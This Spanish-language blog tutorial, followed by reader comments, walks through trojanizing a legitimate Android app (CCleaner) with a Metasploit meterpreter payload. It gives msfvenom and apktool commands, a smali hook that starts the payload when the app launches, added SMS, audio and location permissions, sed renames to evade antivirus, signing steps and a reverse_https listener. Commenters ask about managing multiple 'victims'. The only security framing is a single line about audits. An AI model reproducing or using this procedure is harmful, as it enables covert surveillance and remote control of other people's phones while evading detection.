Tutorial para modificar un APK añadiéndole un payload msf

Ya sabéis que un APK es un paquete de aplicación de Android (Android Aplication Package) y que es como un .exe de Windows que contiene la aplicación y el instalador en el mismo paquete.

Lo que vamos a ver a continuación es un pequeño tutorial de cómo desempaquetar un .apk, y luego modificarlo añadiendo un componente propio generado por metasploit: un meterpreter para Android. Una vez construyamos ese paquete lo instalaremos en un dispositivo Android consiguiendo que se ejecute la app legítima a la vez que nuestro payload dejando infectado el dispositivo Android.

Cuando nos encontremos ante una auditoría podremos aplicar esta técnica para mostrar las vulnerabilidades de las aplicaciones de Android y recordar que lo importante es no instalar nunca aplicaciones de fuentes poco fiables.

Espero que disfrutéis de este pequeño tutorial tanto como yo lo he disfrutado haciéndolo.


Para empezar generamos el payload para Android con msf:

msfvenom -p android/meterpreter/Payload_Type LHOST=IP_Address LPORT=Incoming_Port -o meterpreter.apk


Luego nos descargamos una apk legítima como por ejemplo 'ccleaner' y decompilamos las dos con apktool:

apktool d -f -o payload meterpreter.apk
apktool d -f -o original ccleaner.apk



Copiamos la carpeta metasploit desde /payload/smali/com/metasploit a /original/smali/com/piriform


Nos vamos la carpeta ./original/ y editamos AndroidManifest.xml (con vim o el editor que queráis)


Buscamos las líneas siguientes que nos servirán como guía para encontrar la ruta a la aplicación principal que es la que nosotros queremos modificar:

<action android:name="android.intent.action.MAIN"/>
<category android:name="android.intent.category.LAUNCHER"/>

Encima de éstas, encapsulándolas habrá una etiqueta <activity
Nos fijamos en la propiedad Android:name= de esta etiqueta que tendrá una estructura similar a "com.piriform.ccleaner.ui.activity.MainActivity"


Por tanto, ya sabemos el fichero que tenemos que editar de nuestra app legitima (dentro de ./original/smali/), nos vamos a este fichero que será algo parecido a "com/piriform/ccleaner/ui/activity/MainActivity.smali" , es decir, por cada "." Será una "/".

Editamos este fichero .smali y buscamos la línea:

;->onCreate(Landroid/os/Bundle;)V

En la siguiente línea a esta ponemos:

invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V

Donde le indicamos que invoque nuestra app que en este caso es el Payload de msf y después continúe con la ejecución normal de la app legitima



Ahora vamos a añadir más permisos a esta app de los que tiene, nos vamos dentro del directorio de la aplicación ./original/ y modificamos el AndoridManifest.xml


Añadiremos los permisos que consideremos, en mi caso puse estos:

<uses-permission android:name="android.permission.ACCESS_COURSE_LOCATION"/>
 <uses-permission android:name="android.permission.CHANGE_WIFI_STATE"/>
 <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>
 <uses-permission android:name="android.permission.SEND_SMS"/>
 <uses-permission android:name="android.permission.RECEIVE_SMS"/>
 <uses-permission android:name="android.permission.RECORD_AUDIO"/>
 <uses-permission android:name="android.permission.CALL_PHONE"/>

Si lo que queremos es ponérselo mas difícil a un antivirus que tuviera el móvil/Tablet podemos hacer lo siguiente dentro del directorio (Esto es opcional) ./original/smali/com/metasploit

sed -i 's/metasploit/conf-schema/g' `rgrep -r metasploit ./* | awk '{print $1}' | cut -d':' -f1`
sed -i 's/Payload/init-conf' `rgrep -r Payload ./* | awk '{print $1}' | cut -d':' -f1`
sed -i 's/payload/init-conf' `rgrep -r payload ./* | awk '{print $1}' | cut -d':' -f1`

Después de eso debemos de cambiar el fichero Payload.smali por init-config.smali


también cambiamos el nombre de /original/smali/com/piriform/metasploit a /original/smali/com/piriform/conf-schema, además de todo eso deberemos de cambiar la línea

invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V

que hemos puesto antes con el nombre correspondiente:

invoke-static {p0}, Lcom/conf-scheme/stage/init-conf;->start(Landroid/content/Context;)V

yo he puesto estos nombres pero podéis poner lo que queráis, ahora vamos a recompilar otra vez la app, hacemos:

apktool b original/

A continuación comenzará a construir nuestra app.


Dentro del directorio ./original/dist estará nuestra apk construida/compilada.

Ahora toca firmar la apk para que esta sea "legitima" por tanto creamos en nuestro home el directorio .android

mkdir ~/.android

Generamos la key para firmar con:

keytool -genkey -v -keystore ~/.android/debug.keystore -storepass android -alias androiddebugkey -keypass android -dname "CN=Android Debug,O=Android,C=US"

Para firmar con esa firma hacemos:

jarsigner -verbose -keystore ~/.android/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg SHA1withDSA /home/xarly/original/dist/ccleaner-v1-17-66.apk androiddebugkey

Ahora nos queda dejar a la escucha el metasploit con:

msfconsole
use exploit/multi/handler
set Payload android/meterpreter/reverse_https
set LHOST 192.168.1.135
set LPORT 8181
set ExitOnSession False
exploit -j -z

Ejecutamos la app en el móvil:



Deberíamos ver como se conecta nuestro meterpreter.

Nota: puede que nos pida que habilitemos las opciones de orígenes desconocidos.

Y bueno este es el final del manual , no voy a explicar el funcionamiento del metasploit ya que si lo conoces es el mismo de siempre y sino lo conoces pues te invito a que sigas los pasos y te aventures a realizar el Lab.

También dejo disponible la versión en PDF por si lo deseáis descargar:



Fuentes:
- http://null-byte.wonderhowto.com/how-to/embed-metasploit-payload-original-apk-file-part-2-do-manually-0167124/
- http://www.elandroidelibre.com/2016/02/modifica-y-clona-cualquier-aplicacion-con-apk-editor.html
- https://ibotpeaches.github.io/Apktool/documentation/

9 comentarios :

  1. Pero eso sería "esperar" a que instale la app. Cómo sería si ya lo instaló y, por ejemplo, una semana después queremos comprobar si hay conexión y eso? Como iniciar esa sesión específica de meterpreter? Y en el caso de hacerlo con varias "víctimas" nos saldría un menú o algo así para elegir cada conexión?

    ResponderEliminar
  2. Si ya instalo la app, seria buscar otro tipo de vulnerabilidad como que visite un enlace malicioso o que vuelva a instalar la app como una actualizacion, en caso de que se establezca persistencia , bastaria con dejar ejecutado el exploit/multi/handler de metasploit para permitir que se conecten y para ver las sesiones activas basta hacer un sessions -l o sessions (en el metasploit) y verias todos los dispositivos conectados , mas info: https://www.offensive-security.com/metasploit-unleashed/msfconsole-commands/

    ResponderEliminar
  3. Carlos está perfectamente explicado. Enhorabuena amigo.

    ResponderEliminar
  4. Carlos está perfectamente explicado. Enhorabuena amigo.

    ResponderEliminar
  5. no entendi esta parte, quien me explica?


    Si lo que queremos es ponérselo mas difícil a un antivirus que tuviera el móvil/Tablet podemos hacer lo siguiente dentro del directorio (Esto es opcional) ./original/smali/com/metasploit

    sed -i 's/metasploit/conf-schema/g' `rgrep -r metasploit ./* | awk '{print $1}' | cut -d':' -f1`
    sed -i 's/Payload/init-conf' `rgrep -r Payload ./* | awk '{print $1}' | cut -d':' -f1`
    sed -i 's/payload/init-conf' `rgrep -r payload ./* | awk '{print $1}' | cut -d':' -f1`

    ResponderEliminar
    Respuestas
    1. Estas modificando path absolutos por relativos, con rgrep realizas la busqueda recursiva en el directorio al marcarlo con "./*" printando el primer campo del resultado delimitado por espacios (awk) siendo a su vez delimitado por el caracter ':' mostrando el nombre del fichero, que se entiende que es el primero campo.

      Que me corrija el autor, pero creo que lo que se busca es que el antivirus no consiga encontrar palabras clave utilizadas en sus BBDD.

      comandos como sed, awk, y cut, son muy utiles y utilizados en entornos linux.

      Eliminar
    2. Estas modificando path absolutos por relativos, con rgrep realizas la busqueda recursiva en el directorio al marcarlo con "./*" printando el primer campo del resultado delimitado por espacios (awk) siendo a su vez delimitado por el caracter ':' mostrando el nombre del fichero, que se entiende que es el primero campo.

      Que me corrija el autor, pero creo que lo que se busca es que el antivirus no consiga encontrar palabras clave utilizadas en sus BBDD.

      comandos como sed, awk, y cut, son muy utiles y utilizados en entornos linux.

      Eliminar
  6. Una pregunta,todo lo que se ha hecho sirve solo para la version de CCleaner en el ejemplo o para cualquier version,lo pregunto porque al editar los archivos para agregar la linea,a mi no me figura exactamente lo mismo dentro del archivo,esto puede deberse a que yo use otra version de ccleaner?????? no me quise complicar con firmas y con el tema del antivirus pero igual al final me arrojo error en mi tablet en donde la meti.Que puede haber pasado?????

    ResponderEliminar
    Respuestas
    1. no, en principio debería de valer para todas las apk que quieras, esa app la utilice como ejemplo, pero puedes meter el payload en la apk que quieras siguiente el manual.

      Eliminar